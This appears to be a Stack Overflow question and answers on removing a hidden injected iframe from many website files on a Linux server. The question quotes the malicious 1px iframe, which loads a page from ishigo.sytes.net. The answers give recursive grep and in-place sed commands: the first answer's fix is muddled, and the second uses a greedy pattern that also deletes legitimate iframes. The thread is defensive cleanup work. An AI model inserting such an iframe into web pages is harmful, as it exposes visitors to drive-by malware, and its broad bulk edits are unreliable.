# Looking for script to delete iframe malware from linux server

Tags: iframe, malware

I'm looking for a script to delete the following iframe malware from my linux server:

```
    <iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>
```

It has infected hundreads of files on my server on different websites. I tried

```
    grep -rl ishigo.sytes.net * | sed 's/ /\ /g' | xargs sed -i 's/<iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe>//g'
```

but it just outputs:

```
    sed: -e expression #1, char 49: unknown option to `s'
```

Appreciate your help :)

Cheers
Dee

Answer (score 1):

Unescape the backslashes from the url in the sed regex.

Answer (score 0):

This should be a more generic solution. Effectively what the malware does is look for the `</body>` and inject the `iframe` it just before that. So you can look for an `iframe` which is just before the `</body>` and replace it with just the `</body>`

```sh
# grep recursively for text
# escape all spaces in file names
# global search and replace with just body tag
grep -Rl "</iframe></body>" * | sed 's/ /\ /g' | xargs sed -i 's/<iframe .*><\/iframe><\/body>/<\/body>/g'
```

I found this [other question on renaming the malware files](https://stackoverflow.com/questions/91899/use-grep-to-find-content-in-files-and-move-them-if-they-match) is also useful to quickly take down all the compromised files by renaming the extensions with a `.hacked` at the end. Then you can fix the hack and finally remove the `.hacked`